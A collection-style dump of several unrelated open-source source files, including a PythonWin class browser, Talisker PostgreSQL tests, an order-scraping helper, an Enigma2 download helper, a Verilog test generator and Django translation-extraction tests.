file = clbrfunc.file
lineno = clbrfunc.lineno
HierListCLBRItem.__init__(self, name, file, lineno, suffix)
def GetBitmapColumn(self):
return 22
class HierListCLBRMethod(HierListCLBRItem):
def GetBitmapColumn(self):
return 22
class HierListCLBRErrorItem(hierlist.HierListItem):
def __init__(self, text):
self.text = text
def GetText(self):
return self.text
def GetSubList(self):
return [HierListCLBRErrorItem(self.text)]
def IsExpandable(self):
return 0
class HierListCLBRErrorRoot(HierListCLBRErrorItem):
def IsExpandable(self):
return 1
class BrowserView(pywin.mfc.docview.TreeView):
def OnInitialUpdate(self):
self.list = None
rc = self._obj_.OnInitialUpdate()
self.HookMessage(self.OnSize, win32con.WM_SIZE)
self.bDirty = 0
self.destroying = 0
return rc
def DestroyBrowser(self):
self.DestroyList()
def OnActivateView(self, activate, av, dv):
# print "AV", self.bDirty, activate
if activate:
self.CheckRefreshList()
return self._obj_.OnActivateView(activate, av, dv)
def _MakeRoot(self):
path = self.GetDocument().GetPathName()
if not path:
return HierListCLBRErrorRoot("Error: Can not browse a file until it is saved")
else:
mod, path = pywin.framework.scriptutils.GetPackageModuleName(path)
if self.bDirty:
what = "Refreshing"
# Hack for pyclbr being too smart
try:
del pyclbr._modules[mod]
except (KeyError, AttributeError):
pass
else:
what = "Building"
win32ui.SetStatusText("%s class list - please wait..." % (what,), 1)
win32ui.DoWaitCursor(1)
try:
reader = pyclbr.readmodule_ex # new version post 1.5.2
except AttributeError:
reader = pyclbr.readmodule
try:
data = reader(mod, [path])
if data:
return HierListCLBRModule(mod, data)
else:
return HierListCLBRErrorRoot("No Python classes in module.")
finally:
win32ui.DoWaitCursor(0)
win32ui.SetStatusText(win32ui.LoadString(afxres.AFX_IDS_IDLEMESSAGE))
def DestroyList(self):
self.destroying = 1
list = getattr(self, "list", None) # If the document was not successfully opened, we may not have a list.
self.list = None
if list is not None:
list.HierTerm()
self.destroying = 0
def CheckMadeList(self):
if self.list is not None or self.destroying: return
self.rootitem = root = self._MakeRoot()
self.list = list = hierlist.HierListWithItems( root, win32ui.IDB_BROWSER_HIER)
list.HierInit(self.GetParentFrame(), self)
list.SetStyle(commctrl.TVS_HASLINES | commctrl.TVS_LINESATROOT | commctrl.TVS_HASBUTTONS)
def CheckRefreshList(self):
if self.bDirty:
if self.list is None:
self.CheckMadeList()
else:
new_root = self._MakeRoot()
if self.rootitem.__class__==new_root.__class__==HierListCLBRModule:
self.rootitem.modName = new_root.modName
self.rootitem.clbrdata = new_root.clbrdata
self.list.Refresh()
else:
self.list.AcceptRoot(self._MakeRoot())
self.bDirty = 0
def OnSize(self, params):
lparam = params[3]
w = win32api.LOWORD(lparam)
h = win32api.HIWORD(lparam)
if w != 0:
self.CheckMadeList()
elif w == 0:
self.DestroyList()
return 1
def _UpdateUIForState(self):
self.bDirty = 1
|
cxxgtxy/tensorflow | refs/heads/master | tensorflow/contrib/quantization/python/nn_ops.py | 179 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Wrappers for primitive Neural Net (NN) Operations."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: disable=unused-import,wildcard-import
from tensorflow.python.framework import common_shapes
from tensorflow.python.framework import ops
from tensorflow.python.ops import gen_nn_ops
from tensorflow.python.ops.gen_nn_ops import *
# pylint: enable=unused-import,wildcard-import
|
gganis/root | refs/heads/master | interpreter/llvm/src/tools/clang/tools/scan-build-py/tests/unit/__init__.py | 24 | # -*- coding: utf-8 -*-
# The LLVM Compiler Infrastructure
#
# This file is distributed under the University of Illinois Open Source
# License. See LICENSE.TXT for details.
from . import test_libear
from . import test_compilation
from . import test_clang
from . import test_runner
from . import test_report
from . import test_analyze
from . import test_intercept
from . import test_shell
def load_tests(loader, suite, _):
suite.addTests(loader.loadTestsFromModule(test_libear))
suite.addTests(loader.loadTestsFromModule(test_compilation))
suite.addTests(loader.loadTestsFromModule(test_clang))
suite.addTests(loader.loadTestsFromModule(test_runner))
suite.addTests(loader.loadTestsFromModule(test_report))
suite.addTests(loader.loadTestsFromModule(test_analyze))
suite.addTests(loader.loadTestsFromModule(test_intercept))
suite.addTests(loader.loadTestsFromModule(test_shell))
return suite
|
bloodearnest/talisker | refs/heads/master | tests/test_postgresql.py | 2 | #
# Copyright (c) 2015-2018 Canonical, Ltd.
#
# This file is part of Talisker
# (see http://github.com/canonical-ols/talisker).
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
from builtins import * # noqa
import pytest
from freezegun import freeze_time
try:
import psycopg2 # NOQA
except ImportError:
pytest.skip("skipping postgres only tests", allow_module_level=True)
# need for some fixtures
from tests import conftest # noqa
from talisker.postgresql import (
TaliskerConnection,
prettify_sql,
FILTERED,
)
import talisker.sentry
@pytest.fixture
def conn(postgresql):
return TaliskerConnection(postgresql.dsn)
@pytest.fixture
def cursor(conn):
return conn.cursor()
def test_connection_record_slow(conn, context, get_breadcrumbs):
query = 'select * from table where id=%s'
conn._threshold = 0
conn._record('msg', query, (1,), 10000)
records = context.logs.filter(name='talisker.slowqueries')
assert records[0].extra['duration_ms'] == 10000.0
assert records[0]._trailer == prettify_sql(query)
@pytest.mark.skipif(not talisker.sentry.enabled, reason='need raven installed')
def test_connection_record_fast(conn, context):
query = 'select * from table'
conn._record('msg', query, None, 0)
context.assert_not_log(name='talisker.slowqueries')
@pytest.mark.skipif(not talisker.sentry.enabled, reason='need raven installed')
def test_connection_record_breadcrumb(conn, get_breadcrumbs):
talisker.Context.new()
query = 'select * from table'
conn._record('msg', query, None, 1000)
breadcrumb = get_breadcrumbs()[0]
assert breadcrumb['message'] == 'msg'
assert breadcrumb['category'] == 'sql'
assert breadcrumb['data']['duration_ms'] == 1000.0
assert breadcrumb['data']['connection'] == conn.safe_dsn
assert 'query' in breadcrumb['data']
@freeze_time()
def test_cursor_sets_statement_timeout(cursor, get_breadcrumbs):
talisker.Context.new()
talisker.Context.set_relative_deadline(1000)
cursor.execute('select %s', [1])
crumbs = get_breadcrumbs()
assert crumbs[0]['data']['query'] == 'SELECT %s'
assert crumbs[0]['data']['timeout'] == 1000
def test_cursor_actually_times_out(cursor, get_breadcrumbs):
talisker.Context.new()
talisker.Context.set_relative_deadline(10)
with pytest.raises(psycopg2.OperationalError) as err:
cursor.execute('select pg_sleep(1)', [1])
assert err.value.pgcode == '57014'
breadcrumb = get_breadcrumbs()[0]
assert breadcrumb['data']['timedout'] is True
assert breadcrumb['data']['pgcode'] == '57014'
assert breadcrumb['data']['pgerror'] == (
'ERROR: canceling statement due to statement timeout\n'
)
@pytest.mark.skipif(not talisker.sentry.enabled, reason='need raven installed')
def test_cursor_execute_no_params(cursor, get_breadcrumbs):
talisker.Context.new()
cursor.execute('select 1')
breadcrumb = get_breadcrumbs()[0]
assert breadcrumb['data']['query'] == FILTERED
@pytest.mark.skipif(not talisker.sentry.enabled, reason='need raven installed')
def test_cursor_callproc_with_params(cursor, get_breadcrumbs):
talisker.Context.new()
cursor.execute(
"""CREATE OR REPLACE FUNCTION test(integer) RETURNS integer
AS 'select $1'
LANGUAGE SQL;""")
cursor.callproc('test', [1])
breadcrumb = get_breadcrumbs()[1]
assert breadcrumb['data']['query'] == FILTERED
@pytest.mark.skipif(not talisker.sentry.enabled, reason='need raven installed')
def test_cursor_callproc_no_params(cursor, get_breadcrumbs):
talisker.Context.new()
cursor.execute(
"""CREATE OR REPLACE FUNCTION test() RETURNS integer
AS 'select 1'
LANGUAGE SQL;""")
cursor.callproc('test')
breadcrumb = get_breadcrumbs()[0]
assert breadcrumb['data']['query'] == FILTERED
|
lastcc/OAHelper | refs/heads/master | oa/models.py | 1 | # -*- coding: utf-8 -*-
from bs4 import BeautifulSoup
from log_config import logger
class Struct(object):
"""
An object that has attributes built from the dictionary given in
constructor. So ss=Struct(a=1, b='b') will satisfy assert ss.a == 1
and assert ss.b == 'b'.
"""
def __init__(self, **kwargs):
self.__dict__.update(kwargs)
def __getitem__(self, key):
return self.__dict__[key]
def get_items(self, keys):
keys = keys.split('/')
L = []
for key in keys:
value = self.__dict__[key]
L.append(value)
return L
def set_items(self, keys, values):
if isinstance(keys, (unicode, str)):
keys = keys.split('/')
if not isinstance(values, (list, tuple)):
raise ZeroDivisionError('not correct type of values')
elif not len(keys) == len(values):
print keys
print values
while len(keys) > len(values):
keys.append('ph')
while len(values) > len(keys):
values.append('ph')
#raise ZeroDivisionError('not the same length')
d=dict(zip(keys,values))
self.__dict__.update(d)
def __len__(self):
return len(self.__dict__)
def __getattr__(self, attr):
if attr.startswith('get_'):
name = attr[4:]
return self.__dict__[name]
else:
raise NameError('No such arrribute: %r' % attr)
def mergeXYZ(self, *objects):
d = {}
for xxx in objects:
d.update(xxx.__dict__)
new = self.__class__(**d)
return new
def mergeINPLACE(self, y):
dY = y.__dict__
self.__dict__.update(dY)
return self
def __add__(self, other):
if not isinstance(other, Struct):
return NotImplemented
d = {}
d.update(self.__dict__)
d.update(other.__dict__)
return self.__class__(**d)
def set_defaults(self, keys, v=''):
if isinstance(keys, (unicode, str)):
for k in keys.split('/'):
self.__dict__[k] = v
class Finder(object):
def __init__(self, J):
self.J = J
self.rows = J.get('rows', [])
self.gen = self.generator()
@property
def JSON(self, J):
return self.J
@property
def total(self):
return self.J['total']
def __iter__(self):
return self
def html_filter(self, html):
if not html:
return ''
soup = BeautifulSoup(html)
return soup.get_text()
def generator(self):
rows = self.rows
for row in rows:
xxID = row['id']
cell = row['cell']
cell.insert(0, xxID)
new = map(self.html_filter, cell)
yield new
def next(self):
return self.gen.next()
class SearchResultFinder(Finder):
'''JSON Search Result Finder'''
def find_all_orders(self):
L=[]
rows=self.rows
for row in rows:
order=row['id']
L.append(order)
return L
def get_order_object(self, order):
rows=self.rows
ss = Struct()
for rec in Finder(self.J):
this_order = rec[0]
if order == this_order:
keys = 'order/ph/ph/tracking_code/order_error_text/buyer_message/comment_area/paypal_code/buyer/add_email/'\
'add_receiver/CN_dest/warehouse/shipping_method/online_shipping_method/store_name/order_status/'\
'shipped_time/intercepted_for/import_time'
values = rec
ss.set_items(keys, values)
return ss
def get_all_order_objects(self):
L=[]
for order in self.find_all_orders():
L.append(self.get_order_object(order))
return L
def generator(self):
order_objects = self.get_all_order_objects()
for each in order_objects:
yield each
def build_order_info_object(SoupResultSet, order):
keys = 'order_status/warehouse/shipping_method/add_country/add_st1/add_st2/add_state/add_city/add_receiver/add_phone/add_zip/should_weight/'\
'add_email/x_remark/comment_area/order_total/paypal_code/user_cookie/order_x_id/tracking_code/actual_weight/CN_shipping_fee/shipped_time/'\
'store_name/order_error_text/opt_status/buyer_message/online_shipping_method/__place_holder__/ph'
values=[]
for tag in SoupResultSet:
print tag
value=tag.get_text()
values.append(value)
ss = Struct()
ss.set_items(keys, values)
ss.order=order
ss.add_country = ss.add_country.encode('ascii', 'ignore')
return ss
def build_order_detail_containers(soup):
areas=soup.find_all('tr')
L=[]
for area in areas:
tags=area.find_all('td')
ss = Struct()
keys = 'ItemID/ProductName/SKU/POA/Position/Quantity/X_Price/ProductStatus/'\
'Pattern/X_Weight/Y_Weight/ProductManager/TestedBy/FromOrder'
values = []
for tag in tags:
value = tag.get_text()
values.append(value)
ss.set_items(keys, values)
L.append(ss)
return L
def bulid_refund_info(soup, phase):
soup = soup.find('tbody')
if not soup:
return []
areas=soup.find_all('tr')
finished = 'order/amount/currency/reasons/initiator/init_time/confirmed_by/confirm_time/'\
'completed_by/complete_time/paypal_code/final_amount/final_currency/reason_type/paypal_account'
unconfirmed = 'ph/order/amount/transaction_total/currency/reasons/initiator/init_time/ph/ph/ph/reason_type/paypal_account'
confirmed = 'ph/order/amount/currency/reasons/initiator/init_time/confirmed_by/confirm_time/ph/ph/ph/ph/reason_type/ph/ph'
d = {'finished': finished,
'unconfirmed': unconfirmed,
'confirmed': confirmed}
L=[]
for area in areas:
tags=area.find_all('td')
ss = Struct()
default = Struct()
default.set_defaults(finished)
default.set_defaults(unconfirmed)
default.set_defaults(confirmed)
keys = d[phase]
values = []
for tag in tags:
value = tag.get_text(strip=True)
values.append(value)
ss.set_items(keys, values)
ss.reason_CN, sep, ss.reason_EN = ss.reasons.rpartition('\n')
color = area.get('class', None)
ss.refund_error = color
ss.phase = phase
new = default + ss
L.append(new)
return L
class MailRecordsFinder(Finder):
'''This is for Mail Records'''
def find_ids(self):
L=[]
rows=self.rows
for row in rows:
this_id=row['id']
L.append(this_id)
def generator(self):
rows = self.rows
for rec in Finder(self.J):
this_id, ph, ph, title, sender, receiver, time, sent, responder, X_ID = rec
link = 'http://banggood.sellercube.com/MailReceived/SearchDetail/%s' % this_id
yield this_id, link, title, sender, receiver, time, sent, responder
class MailInboxFinder(Finder):
'''This is for Mail Inbox'''
def find_buyers(self):
L=[]
rows=self.rows
for row in rows:
cell=row['cell']
buyer=cell[8]
if buyer in L or not buyer:
continue
L.append(buyer)
return L
def generator(self):
existed = []
for rec in Finder(self.J):
ss = Struct()
keys = 'MAIL_ID/PH/PH/PH/PH/MAIL_TITLE/MAIL_SENDER/MAIL_RECEIVER/MAIL_ITEM/MAIL_BUYER/MAIL_RESPONDER/'\
'MAIL_RECEIVE_TIME/MAIL_DOWNLOAD_TIME/MAIL_FORWARDED_BY/MAIL_FORWARD_TIME/MAIL_FORWARD_COMMENT'
values = rec
this_buyer = rec[9]
if not this_buyer or this_buyer in existed:
continue
else:
existed.append(this_buyer)
ss.set_items(keys, values)
yield ss
class ContactBuyerFinder(Finder):
def find_buyers(self):
L=[]
rows=self.rows
for row in rows:
cell=row['cell']
buyer=cell[10]
L.append(buyer)
return L
def generator(self):
L=[]
for rec in Finder(self.J):
ss = Struct()
keys = 'order/ph/ph/ph/ph/responder/assign_time/order_error_text/buyer_message/comment_area/paypal_code/buyer/add_email/'\
'add_receiver/CN_dest/warehouse/shipping_method/online_shipping_method/store_name/order_status/import_time'
values = rec
ss.set_items(keys, values)
yield ss
class TemplatesFinder(Finder):
def html_filter(self, html):
if not html:
return ''
html = html.replace('<br />', '\n')
return html
class X(Struct):
"""Full Order Container"""
@property
def middle_time(self):
history = self.history
if not history:
return '[History Not Enabled]'
for x in history:
who = x['UserId']
what = x['OperateName']
text = x['OperateLog']
status_name = x['StateName']
time = x['OperateDate']
orderID = x['OrderId']
if u'已交寄' in status_name:
return time
return '[Mid-time Not Found]'
@property
def isSentLess(self):
def f(x):
return x.isdigit() or x == '.'
if not self.actual_weight:
return u'Actual Weight Unknown'
if not self.should_weight:
return u'Should Weight Unknown'
actual_float = float(filter(f, self.get_actual_weight))
should_float = float(filter(f, self.get_should_weight))
difference = actual_float - should_float
isless = actual_float < should_float
percent = (difference) / should_float
if isless:
return str(percent * 100)
else:
return 'ok'
def HasItem(self, itemID):
for each in self.details:
if itemID == each.ItemID:
return True
return False
@property
def status(self):
return self.order_status
@property
def isFinished(self):
return not self.status in u'待检查/未确认/已拦截/联系客户'
@property
def isOngoing(self):
return not self.isFinished
@property
def isInterceptable(self):
return self.status in u'处理中'
|
openhdf/enigma2-wetek | refs/heads/master | lib/python/Tools/Downloader.py | 5 | from boxbranding import getMachineBrand, getMachineName
from twisted.web import client
from twisted.internet import reactor, defer, ssl
class HTTPProgressDownloader(client.HTTPDownloader):
def __init__(self, url, outfile, headers=None):
client.HTTPDownloader.__init__(self, url, outfile, headers=headers, agent="Enigma2 HbbTV/1.1.1 (+PVR+RTSP+DL;OpenATV;;;)")
self.status = None
self.progress_callback = None
self.deferred = defer.Deferred()
def noPage(self, reason):
if self.status == "304":
print reason.getErrorMessage()
client.HTTPDownloader.page(self, "")
else:
client.HTTPDownloader.noPage(self, reason)
def gotHeaders(self, headers):
if self.status == "200":
if headers.has_key("content-length"):
self.totalbytes = int(headers["content-length"][0])
else:
self.totalbytes = 0
self.currentbytes = 0.0
return client.HTTPDownloader.gotHeaders(self, headers)
def pagePart(self, packet):
if self.status == "200":
self.currentbytes += len(packet)
if self.totalbytes and self.progress_callback:
self.progress_callback(self.currentbytes, self.totalbytes)
return client.HTTPDownloader.pagePart(self, packet)
def pageEnd(self):
return client.HTTPDownloader.pageEnd(self)
class downloadWithProgress:
def __init__(self, url, outputfile, contextFactory=None, *args, **kwargs):
if hasattr(client, '_parse'):
scheme, host, port, path = client._parse(url)
else:
from twisted.web.client import _URI
uri = _URI.fromBytes(url)
scheme = uri.scheme
host = uri.host
port = uri.port
path = uri.path
self.factory = HTTPProgressDownloader(url, outputfile, *args, **kwargs)
if scheme == "https":
self.connection = reactor.connectSSL(host, port, self.factory, ssl.ClientContextFactory())
else:
self.connection = reactor.connectTCP(host, port, self.factory)
def start(self):
return self.factory.deferred
def stop(self):
if self.connection:
print "[stop]"
self.connection.disconnect()
def addProgress(self, progress_callback):
print "[addProgress]"
self.factory.progress_callback = progress_callback
|
cseed/arachne-pnr | refs/heads/master | tests/combinatorial/generate.py | 2 | #!/usr/bin/python
from __future__ import division
from __future__ import print_function
import sys
import random
from contextlib import contextmanager
random.seed(1)
@contextmanager
def redirect_stdout(new_target):
old_target, sys.stdout = sys.stdout, new_target
try:
yield new_target
finally:
sys.stdout = old_target
def random_term(variables):
n_inputs = random.randint(4, 9)
inputs = [random.choice(variables) for i in range(0, n_inputs)]
n_terms = random.randint(3, 5)
term = ' | '.join([
('('
+ ' & '.join([
random.choice([v, '~' + v])
for v in inputs])
+ ')')
for i in range(0, n_terms)])
return term
for idx in range(25):
with open('temp/uut_%05d.v' % idx, 'w') as f:
with redirect_stdout(f):
pins = 96
n_inputs = random.randint(3, pins / 2)
n_outputs = random.randint(3, pins / 2)
print('module uut_%05d(' % (idx), end="")
variables = ['i0']
print('input i0', end='')
for i in range(1, n_inputs+1):
v = 'i%d' % (i)
print(', input %s' % (v), end='')
variables.append(v)
for i in range(0, n_outputs+1):
print(', output o%d' % (i), end='')
print(');')
n_temps = random.randint(3,50)
for i in range(0, n_temps):
p = random.random()
if p < 0.05:
width = random.randint(3, 16)
a = ('{'
+ ', '.join([random.choice(variables) for j in range(0, width)])
+ '}')
b = ('{'
+ ', '.join([random.choice(variables) for j in range(0, width)])
+ '}')
op = random.choice(['+', '-'])
print(' wire [%d:0] t%d = %s %s %s;'
% (width - 1, i, a, op, b))
for j in range(0, width):
variables.append('t%d[%d]' % (i, j))
elif p < 0.1:
width = random.randint(3, 16)
a = ('{'
+ ', '.join([random.choice(variables) for j in range(0, width)])
+ '}')
b = ('{'
+ ', '.join([random.choice(variables) for j in range(0, width)])
+ '}')
op = random.choice(['<', '<=', '>', '>=', '==', '!='])
print(' wire t%d = %s %s %s;'
% (i, a, op, b))
variables.append('t%d' % (i))
else:
term = random_term(variables)
print(' wire t%d = %s;' % (i, term))
variables.append('t%d' % (i))
for i in range(0, n_outputs+1):
term = random_term(variables)
print(' assign o%d = %s;' % (i, term))
print('endmodule')
with open('temp/uut_%05d.ys' % idx, 'w') as f:
with redirect_stdout(f):
print('rename uut_%05d gate' % idx)
print('read_verilog temp/uut_%05d.v' % idx)
print('rename uut_%05d gold' % idx)
print('hierarchy; proc;;')
print('miter -equiv -flatten -ignore_gold_x -make_outputs -make_outcmp gold gate miter')
print('sat -verify-no-timeout -timeout 20 -prove trigger 0 -show-inputs -show-outputs miter')
with open('temp/uut_%05d_pp.ys' % idx, 'w') as f:
with redirect_stdout(f):
print('rename uut_%05d gate' % idx)
print('read_verilog temp/uut_%05d.v' % idx)
print('rename uut_%05d gold' % idx)
print('hierarchy; proc;;')
print('techmap -map +/adff2dff.v; opt;;')
print('miter -equiv -flatten -ignore_gold_x -make_outputs -make_outcmp gold gate miter')
print('sat -verify-no-timeout -timeout 20 -prove trigger 0 -show-inputs -show-outputs miter')
|
kamyu104/django | refs/heads/master | tests/i18n/test_extraction.py | 89 | # -*- encoding: utf-8 -*-
from __future__ import unicode_literals
import io
import os
import re
import shutil
import time
import warnings
from unittest import SkipTest, skipUnless
from django.conf import settings
from django.core import management
from django.core.management import execute_from_command_line
from django.core.management.base import CommandError
from django.core.management.commands.makemessages import \
Command as MakeMessagesCommand
from django.core.management.utils import find_command
from django.test import SimpleTestCase, mock, override_settings
from django.test.testcases import SerializeMixin
from django.test.utils import captured_stderr, captured_stdout
from django.utils import six
from django.utils._os import upath
from django.utils.encoding import force_text
from django.utils.six import StringIO
from django.utils.translation import TranslatorCommentWarning
LOCALE = 'de'
has_xgettext = find_command('xgettext')
this_directory = os.path.dirname(upath(__file__))
@skipUnless(has_xgettext, 'xgettext is mandatory for extraction tests')
class ExtractorTests(SerializeMixin, SimpleTestCase):
# makemessages scans the current working directory and writes in the
# locale subdirectory. There aren't any options to control this. As a
# consequence tests can't run in parallel. Since i18n tests run in less
# than 4 seconds, serializing them with SerializeMixin is acceptable.
lockfile = __file__
test_dir = os.path.abspath(os.path.join(this_directory, 'commands'))
PO_FILE = 'locale/%s/LC_MESSAGES/django.po' % LOCALE
def setUp(self):
self._cwd = os.getcwd()
def _rmrf(self, dname):
if os.path.commonprefix([self.test_dir, os.path.abspath(dname)]) != self.test_dir:
return
shutil.rmtree(dname)
def rmfile(self, filepath):
if os.path.exists(filepath):
os.remove(filepath)
def tearDown(self):
os.chdir(self.test_dir)
try:
self._rmrf('locale/%s' % LOCALE)
except OSError:
pass
os.chdir(self._cwd)
def _run_makemessages(self, **options):
os.chdir(self.test_dir)
out = StringIO()
management.call_command('makemessages', locale=[LOCALE], verbosity=2,
stdout=out, **options)
output = out.getvalue()
self.assertTrue(os.path.exists(self.PO_FILE))
with open(self.PO_FILE, 'r') as fp:
po_contents = fp.read()
return output, po_contents
def _assertPoKeyword(self, keyword, expected_value, haystack, use_quotes=True):
q = '"'
if use_quotes:
expected_value = '"%s"' % expected_value
q = "'"
needle = '%s %s' % (keyword, expected_value)
expected_value = re.escape(expected_value)
return self.assertTrue(re.search('^%s %s' % (keyword, expected_value), haystack, re.MULTILINE),
'Could not find %(q)s%(n)s%(q)s in generated PO file' % {'n': needle, 'q': q})
def assertMsgId(self, msgid, haystack, use_quotes=True):
return self._assertPoKeyword('msgid', msgid, haystack, use_quotes=use_quotes)
def assertMsgIdPlural(self, msgid, haystack, use_quotes=True):
return self._assertPoKeyword('msgid_plural', msgid, haystack, use_quotes=use_quotes)
def assertMsgStr(self, msgstr, haystack, use_quotes=True):
return self._assertPoKeyword('msgstr', msgstr, haystack, use_quotes=use_quotes)
def assertNotMsgId(self, msgid, s, use_quotes=True):
if use_quotes:
msgid = '"%s"' % msgid
msgid = re.escape(msgid)
return self.assertTrue(not re.search('^msgid %s' % msgid, s, re.MULTILINE))
def _assertPoLocComment(self, assert_presence, po_filename, line_number, *comment_parts):
with open(po_filename, 'r') as fp:
po_contents = force_text(fp.read())
if os.name == 'nt':
# #: .\path\to\file.html:123
cwd_prefix = '%s%s' % (os.curdir, os.sep)
else:
# #: path/to/file.html:123
cwd_prefix = ''
parts = ['#: ']
path = os.path.join(cwd_prefix, *comment_parts)
parts.append(path)
if isinstance(line_number, six.string_types):
line_number = self._get_token_line_number(path, line_number)
if line_number is not None:
parts.append(':%d' % line_number)
needle = ''.join(parts)
if assert_presence:
return self.assertIn(needle, po_contents, '"%s" not found in final .po file.' % needle)
else:
return self.assertNotIn(needle, po_contents, '"%s" shouldn\'t be in final .po file.' % needle)
def _get_token_line_number(self, path, token):
with open(path) as f:
for line, content in enumerate(f, 1):
if token in force_text(content):
return line
self.fail("The token '%s' could not be found in %s, please check the test config" % (token, path))
def assertLocationCommentPresent(self, po_filename, line_number, *comment_parts):
"""
self.assertLocationCommentPresent('django.po', 42, 'dirA', 'dirB', 'foo.py')
verifies that the django.po file has a gettext-style location comment of the form
`#: dirA/dirB/foo.py:42`
(or `#: .\dirA\dirB\foo.py:42` on Windows)
None can be passed for the line_number argument to skip checking of
the :42 suffix part.
A string token can also be pased as line_number, in which case it
will be searched in the template, and its line number will be used.
A msgid is a suitable candidate.
"""
return self._assertPoLocComment(True, po_filename, line_number, *comment_parts)
def assertLocationCommentNotPresent(self, po_filename, line_number, *comment_parts):
"""Check the opposite of assertLocationComment()"""
return self._assertPoLocComment(False, po_filename, line_number, *comment_parts)
def assertRecentlyModified(self, path):
"""
Assert that file was recently modified (modification time was less than 10 seconds ago).
"""
delta = time.time() - os.stat(path).st_mtime
self.assertLess(delta, 10, "%s was recently modified" % path)
def assertNotRecentlyModified(self, path):
"""
Assert that file was not recently modified (modification time was more than 10 seconds ago).
"""
delta = time.time() - os.stat(path).st_mtime
self.assertGreater(delta, 10, "%s wasn't recently modified" % path)
class BasicExtractorTests(ExtractorTests):
def test_comments_extractor(self):
os.chdir(self.test_dir)
management.call_command('makemessages', locale=[LOCALE], verbosity=0)
self.assertTrue(os.path.exists(self.PO_FILE))
with io.open(self.PO_FILE, 'r', encoding='utf-8') as fp:
po_contents = fp.read()
self.assertNotIn('This comment should not be extracted', po_contents)
# Comments in templates
self.assertIn('#. Translators: This comment should be extracted', po_contents)
self.assertIn(
"#. Translators: Django comment block for translators\n#. "
"string's meaning unveiled",
po_contents
)
self.assertIn('#. Translators: One-line translator comment #1', po_contents)
self.assertIn('#. Translators: Two-line translator comment #1\n#. continued here.', po_contents)
self.assertIn('#. Translators: One-line translator comment #2', po_contents)
self.assertIn('#. Translators: Two-line translator comment #2\n#. continued here.', po_contents)
self.assertIn('#. Translators: One-line translator comment #3', po_contents)
self.assertIn('#. Translators: Two-line translator comment #3\n#. continued here.', po_contents)
self.assertIn('#. Translators: One-line translator comment #4', po_contents)
self.assertIn('#. Translators: Two-line translator comment #4\n#. continued here.', po_contents)
self.assertIn(
'#. Translators: One-line translator comment #5 -- with '
'non ASCII characters: áéíóúö',
po_contents
)
self.assertIn(
'#. Translators: Two-line translator comment #5 -- with '
'non ASCII characters: áéíóúö\n#. continued here.',
po_contents
)
def test_blocktrans_trimmed(self):
os.chdir(self.test_dir)
management.call_command('makemessages', locale=[LOCALE], verbosity=0)
self.assertTrue(os.path.exists(self.PO_FILE))
with open(self.PO_FILE, 'r') as fp:
po_contents = force_text(fp.read())
# should not be trimmed
self.assertNotMsgId('Text with a few line breaks.', po_contents)
# should be trimmed
self.assertMsgId("Again some text with a few line breaks, this time should be trimmed.", po_contents)
# #21406 -- Should adjust for eaten line numbers
self.assertMsgId("Get my line number", po_contents)
self.assertLocationCommentPresent(self.PO_FILE, 'Get my line number', 'templates', 'test.html')
def test_force_en_us_locale(self):
"""Value of locale-munging option used by the command is the right one"""
self.assertTrue(MakeMessagesCommand.leave_locale_alone)
def test_extraction_error(self):
os.chdir(self.test_dir)
msg = (
'Translation blocks must not include other block tags: blocktrans '
'(file %s, line 3)' % os.path.join('templates', 'template_with_error.tpl')
)
with self.assertRaisesMessage(SyntaxError, msg):
management.call_command('makemessages', locale=[LOCALE], extensions=['tpl'], verbosity=0)
# Check that the temporary file was cleaned up
self.assertFalse(os.path.exists('./templates/template_with_error.tpl.py'))
def test_unicode_decode_error(self):
os.chdir(self.test_dir)
shutil.copyfile('./not_utf8.sample', './not_utf8.txt')
self.addCleanup(self.rmfile, os.path.join(self.test_dir, 'not_utf8.txt'))
out = StringIO()
management.call_command('makemessages', locale=[LOCALE], stdout=out)
self.assertIn("UnicodeDecodeError: skipped file not_utf8.txt in .",
force_text(out.getvalue()))
def test_extraction_warning(self):
"""test xgettext warning about multiple bare interpolation placeholders"""
os.chdir(self.test_dir)
shutil.copyfile('./code.sample', './code_sample.py')
self.addCleanup(self.rmfile, os.path.join(self.test_dir, 'code_sample.py'))
out = StringIO()
management.call_command('makemessages', locale=[LOCALE], stdout=out)
self.assertIn("code_sample.py:4", force_text(out.getvalue()))
def test_template_message_context_extractor(self):
"""
Ensure that message contexts are correctly extracted for the
{% trans %} and {% blocktrans %} template tags.
Refs #14806.
"""
os.chdir(self.test_dir)
management.call_command('makemessages', locale=[LOCALE], verbosity=0)
self.assertTrue(os.path.exists(self.PO_FILE))
with open(self.PO_FILE, 'r') as fp:
po_contents = force_text(fp.read())
# {% trans %}
self.assertIn('msgctxt "Special trans context #1"', po_contents)
self.assertMsgId("Translatable literal #7a", po_contents)
self.assertIn('msgctxt "Special trans context #2"', po_contents)
self.assertMsgId("Translatable literal #7b", po_contents)
self.assertIn('msgctxt "Special trans context #3"', po_contents)
self.assertMsgId("Translatable literal #7c", po_contents)
# {% trans %} with a filter
for minor_part in 'abcdefgh': # Iterate from #7.1a to #7.1h template markers
self.assertIn('msgctxt "context #7.1{}"'.format(minor_part), po_contents)
self.assertMsgId('Translatable literal #7.1{}'.format(minor_part), po_contents)
# {% blocktrans %}
self.assertIn('msgctxt "Special blocktrans context #1"', po_contents)
self.assertMsgId("Translatable literal #8a", po_contents)
self.assertIn('msgctxt "Special blocktrans context #2"', po_contents)
self.assertMsgId("Translatable literal #8b-singular", po_contents)
self.assertIn("Translatable literal #8b-plural", po_contents)
